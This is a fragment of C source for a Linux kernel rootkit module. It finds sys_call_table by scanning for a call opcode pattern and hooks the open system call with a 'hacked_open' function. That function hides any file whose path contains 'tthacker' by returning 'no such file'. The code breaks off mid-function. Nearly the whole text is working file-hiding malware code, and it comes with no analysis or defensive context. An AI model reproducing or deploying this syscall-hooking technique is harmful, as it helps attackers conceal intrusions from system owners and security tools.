static unsigned int SYS_CALL_TABLE_ADDR;
void **sys_call_table;
int base_system_call;
int (*orig_open)(const char *pathname,int flag,mode_t mode);
unsigned char opcode_call[3]={0xff,0x14,0x85};
int match(unsigned char *source)
{
int i;
for(i=0;i<3;i++){
if(source[i] != opcode_call[i])
return 0;
}
return 1;
}
int get_sys_call_table(void)
{
int i,j;
unsigned char *ins=(unsigned char *)base_system_call;
unsigned int sct;
for(i=0;i<100;i++){
if(ins[i]==opcode_call[0]){
if(match(ins+i)){
sct=*((unsigned int *)(ins+3+i));
printk(KERN_ALERT "sys_call_tabl's address is
0x%X\n",sct);
return sct;
}
}
}
printk(KERN_ALERT "can't find the address of sys_call_table\n");
return -1;
}
int hacked_open(const char *pathname,int flag,mode_t mode)
{
// char *kernel_pathname;
char *hide="tthacker";
// kernel_pathname=(char *)kmalloc(1000,GFP_KERNEL);
// memcpy_fromfs(kernel_pathname,pathname,999);
if(strstr(pathname,hide)!=NULL){
printk(KERN_ALERT "find name.\n");
return -ENOENT;
}
else{
// kfree(kernel_pathname);